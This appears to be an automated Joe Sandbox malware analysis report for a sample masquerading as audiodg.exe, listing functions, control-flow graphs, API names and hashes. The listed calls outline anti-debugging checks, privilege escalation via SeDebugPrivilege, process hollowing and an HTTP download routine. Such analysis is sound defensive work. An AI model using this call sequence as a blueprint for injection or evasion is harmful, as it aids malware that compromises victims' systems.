                                                                                                                                                                                                                                                    Function 00007FF6626D3360 Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 217 7ff6626d3360-7ff6626d3376 call 7ff6626d10a0 call 7ff6626d3120 222 7ff6626d3380-7ff6626d33ae call 7ff6626d4168 call 7ff6626d3be8 call 7ff6626d3e18 217->222 223 7ff6626d3378-7ff6626d337a ExitProcess 217->223 230 7ff6626d33ff-7ff6626d3412 call 7ff6626d3e18 222->230 231 7ff6626d33b0-7ff6626d33c1 call 7ff6626d42a8 222->231 236 7ff6626d3414-7ff6626d3425 call 7ff6626d42a8 230->236 237 7ff6626d3450-7ff6626d3463 call 7ff6626d3e18 230->237 238 7ff6626d33c3-7ff6626d33d4 call 7ff6626d42a8 231->238 239 7ff6626d33d6-7ff6626d33d8 ExitProcess 231->239 249 7ff6626d342f call 7ff6626d3180 236->249 250 7ff6626d3427-7ff6626d3429 ExitProcess 236->250 247 7ff6626d3465-7ff6626d3476 call 7ff6626d42a8 237->247 248 7ff6626d34a6-7ff6626d34bc call 7ff6626d3978 call 7ff6626d32f0 237->248 238->239 246 7ff6626d33de call 7ff6626d3210 238->246 257 7ff6626d33e3-7ff6626d33e8 246->257 264 7ff6626d3480 call 7ff6626d3180 247->264 265 7ff6626d3478-7ff6626d347a ExitProcess 247->265 268 7ff6626d3512-7ff6626d35d4 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 248->268 269 7ff6626d34be-7ff6626d34cf call 7ff6626d42a8 248->269 255 7ff6626d3434-7ff6626d3439 249->255 259 7ff6626d343b-7ff6626d3446 Sleep 255->259 260 7ff6626d3448-7ff6626d344a ExitProcess 255->260 262 7ff6626d33ea-7ff6626d33f5 Sleep 257->262 263 7ff6626d33f7-7ff6626d33f9 ExitProcess 257->263 259->255 262->257 270 7ff6626d3485-7ff6626d348a 264->270 275 7ff6626d34e4-7ff6626d34e6 ExitProcess 269->275 276 7ff6626d34d1-7ff6626d34e2 call 7ff6626d42a8 269->276 272 7ff6626d348c-7ff6626d3497 Sleep 270->272 273 7ff6626d3499-7ff6626d349b ExitProcess 270->273 272->270 276->275 279 7ff6626d34ec call 7ff6626d3210 276->279 281 7ff6626d34f1-7ff6626d34f6 279->281 282 7ff6626d3505-7ff6626d3507 ExitProcess 281->282 283 7ff6626d34f8-7ff6626d3503 Sleep 281->283 283->281
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_VznLpbPuTg$worker_VznLpbPuTg$worker_ZLpjbmHstE$worker_pPCJtqmKMc
                                                                                                                                                                                                                                                    • API String ID: 613740775-1274706621
                                                                                                                                                                                                                                                    • Opcode ID: 797031184c772cd596c31f950784cea7339e49193ead83648ca3721263ba3808
                                                                                                                                                                                                                                                    • Instruction ID: 8aafb229a8fcffaf77073a6817f8c27b626177e19384598ab7d21a44cc6a736f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 797031184c772cd596c31f950784cea7339e49193ead83648ca3721263ba3808
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2611A20A1C64BD3FF65AB31EC553BA2270BF80309FA40A35D44ECE1E5CEADE415AB50
                                                                                                                                                                                                                                                    Function 00007FF6626D4168 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 434396405-0
                                                                                                                                                                                                                                                    • Opcode ID: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction ID: 605200138842e2922444f479d8c4a278078089889288d91185c97b61ceab5b92
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81310636618A85C7EB508B55E49072AB7B0FBC4788F601435FA8ECBB68DFBDD4419B00
                                                                                                                                                                                                                                                    Function 00007FF6626D3120 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3920101602-0
                                                                                                                                                                                                                                                    • Opcode ID: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction ID: 5a2e35c25d6b81eaa0831d6e837a6d5bd2b1017f86167a8c4e75992041a070a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFF0342090C28BC3EF315B69A8043AA27B0AB45B4CF600574D98DCE294CFACD519AF52
                                                                                                                                                                                                                                                    Function 00007FF6626D42A8 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4294037311-0
                                                                                                                                                                                                                                                    • Opcode ID: 7cb7a44c0d5384097fc9cae982f15e4040306c9a3300e2096f8f36d6c1bf3f53
                                                                                                                                                                                                                                                    • Instruction ID: f240fa0b4daf4b8f4981d5360e206bf4ca42d502fd3cf9656898b17cfae7cd77
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cb7a44c0d5384097fc9cae982f15e4040306c9a3300e2096f8f36d6c1bf3f53
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AF0302190C68AC3EF205B21E44437A2370FB96308FA00934D98ECA658CFADD855A701
                                                                                                                                                                                                                                                    Function 00007FF6626D1050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 314 7ff6626d1050-7ff6626d108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF6626D1165,?,?,?,?,?,?,00007FF6626D336C), ref: 00007FF6626D1063
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF6626D1165,?,?,?,?,?,?,00007FF6626D336C), ref: 00007FF6626D1078
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                                    • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction ID: 0fab36c3d4b75634e215c58b6c8f514581497a2d780be12b6aa33e564a0d600b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E09276508F84C6CA209B15F84001AB7B4FBC8798FA04525EACD86B28DF3CC165CB00
                                                                                                                                                                                                                                                    Function 00007FF6626D3A28 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 315 7ff6626d3a28-7ff6626d3a37 316 7ff6626d3a4c-7ff6626d3a50 315->316 317 7ff6626d3a39-7ff6626d3a46 VirtualFree 315->317 317->316
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                    • Opcode ID: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction ID: ed56eeec4495fca9a0974be9e38f0388ba5dbaf79765dac692baff1bf266afdf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EED01221F38945C2EB949B26E88971562B0FBC4B48F548135E68DC5568CF7CC0A98F00

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FF6626D1F8C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 318 7ff6626d1f8c-7ff6626d2006 GetModuleFileNameW 319 7ff6626d200d-7ff6626d2049 318->319 320 7ff6626d2008 318->320 322 7ff6626d2061-7ff6626d207d call 7ff6626d1ecc 319->322 323 7ff6626d204b-7ff6626d2053 319->323 321 7ff6626d28b1-7ff6626d28b9 320->321 331 7ff6626d20c0-7ff6626d20ca 322->331 325 7ff6626d2055-7ff6626d205d 323->325 326 7ff6626d207f-7ff6626d209b call 7ff6626d1f0c 323->326 329 7ff6626d205f-7ff6626d20bb 325->329 330 7ff6626d209d-7ff6626d20b9 call 7ff6626d1f4c 325->330 326->331 329->321 330->331 336 7ff6626d20d1-7ff6626d2125 CreateProcessW 331->336 337 7ff6626d20cc 331->337 338 7ff6626d212c-7ff6626d216c CreateFileW 336->338 339 7ff6626d2127 336->339 337->321 340 7ff6626d2173-7ff6626d218f GetFileSize 338->340 341 7ff6626d216e 338->341 339->321 342 7ff6626d2191-7ff6626d2199 340->342 343 7ff6626d219b-7ff6626d21a6 CloseHandle 340->343 341->321 342->343 344 7ff6626d21ab-7ff6626d21d3 VirtualAlloc 342->344 343->321 345 7ff6626d21e5-7ff6626d2210 ReadFile 344->345 346 7ff6626d21d5-7ff6626d21e0 CloseHandle 344->346 347 7ff6626d2212-7ff6626d2230 VirtualFree CloseHandle 345->347 348 7ff6626d2235-7ff6626d2283 CloseHandle GetThreadContext 345->348 346->321 347->321 349 7ff6626d2285-7ff6626d2298 VirtualFree 348->349 350 7ff6626d229d-7ff6626d2322 ReadProcessMemory GetModuleHandleA GetProcAddress 348->350 349->321 352 7ff6626d2324-7ff6626d2337 VirtualFree 350->352 353 7ff6626d233c-7ff6626d23a5 VirtualAllocEx 350->353 352->321 354 7ff6626d23bf-7ff6626d23f3 WriteProcessMemory 353->354 355 7ff6626d23a7-7ff6626d23ba VirtualFree 353->355 356 7ff6626d23f5-7ff6626d2408 VirtualFree 354->356 357 7ff6626d240d-7ff6626d2418 354->357 355->321 356->321 358 7ff6626d242a-7ff6626d243d 357->358 359 7ff6626d2443-7ff6626d24cc WriteProcessMemory 358->359 360 7ff6626d24eb-7ff6626d2532 358->360 361 7ff6626d24ce-7ff6626d24e1 VirtualFree 359->361 362 7ff6626d24e6 359->362 363 7ff6626d2544-7ff6626d2557 360->363 361->321 362->358 365 7ff6626d27dc-7ff6626d2860 WriteProcessMemory SetThreadContext 363->365 366 7ff6626d255d-7ff6626d25ac RtlCompareMemory 363->366 367 7ff6626d2862-7ff6626d2875 VirtualFree 365->367 368 7ff6626d2877-7ff6626d2887 ResumeThread 365->368 369 7ff6626d25ae 366->369 370 7ff6626d25b0-7ff6626d25d9 366->370 367->321 372 7ff6626d289e-7ff6626d28ab VirtualFree 368->372 373 7ff6626d2889-7ff6626d289c VirtualFree 368->373 369->363 374 7ff6626d25e4-7ff6626d25f2 370->374 372->321 373->321 375 7ff6626d27d7 374->375 376 7ff6626d25f8-7ff6626d2683 374->376 375->365 377 7ff6626d2695-7ff6626d26a3 376->377 378 7ff6626d27d2 377->378 379 7ff6626d26a9-7ff6626d26dc 377->379 378->374 380 7ff6626d26de 379->380 381 7ff6626d26e0-7ff6626d27b3 ReadProcessMemory WriteProcessMemory 379->381 380->377 383 7ff6626d27b5-7ff6626d27c8 VirtualFree 381->383 384 7ff6626d27cd 381->384 383->321 384->378
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                                                                    • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                                    • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                                    • Opcode ID: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction ID: 1f02191390cc6d73ec50760b820d81227a61b8bcd94ddcbc3a1c5d0f0e48e36b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09320532608AC5C6EB71CB16E8547AAA3A0FBC8B88F504535DA8DCBB58DF7CD4449B01
                                                                                                                                                                                                                                                    Function 00007FF6626D3FE8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                    • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                                                    • Opcode ID: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction ID: f70a8439f8fda0b192fd2808196862418db6a4383a94e97a668caa9b152ece52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94413D32518A85C7EB50CB11F44476AB7B0FB84798F604535E689CBA98CFFDD448DB00
                                                                                                                                                                                                                                                    Function 00007FF6626D2BFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction ID: ca255e0eef1cc3d2eaf0b9e9b6c25af3bb787fe4c582b7d25556e98f95bdd298
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0641B232608A85C6EBB0CB15E45476AB7B0FB84788F204525EACDCBB99DFBDD4449B40
                                                                                                                                                                                                                                                    Function 00007FF6626D1C20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6626D1C5D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocFileProcessRead
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                    • API String ID: 4279794846-2771526726
                                                                                                                                                                                                                                                    • Opcode ID: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction ID: 354adf484e57698278974e9b650cdd76910ab2755e8f976257d9069e854e1349
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6871D932518A89C3EB508B55F89472AB770FBC4798F605535FA8ACBA68CFBCD4449B00
                                                                                                                                                                                                                                                    Function 00007FF6626D4808 Relevance: 25.7, APIs: 17, Instructions: 166memoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1940452706.00007FF6626D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6626D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940416916.00007FF6626D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940544555.00007FF6626D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940603601.00007FF6626D7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1940649857.00007FF6626D8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff6626d0000_audiodg.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHeap$AllocCloseCreateHandleProcessSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4026551389-0
                                                                                                                                                                                                                                                    • Opcode ID: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction ID: 77655a80f2f58302e07e31ddef6f421e9b26ec000fd93fd12fb2a8378dc6d4a0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43812C36608B85C2EB10CB55F45432AA7B0FBC9B95F604535EA8DC7B68DFBCD4449B40
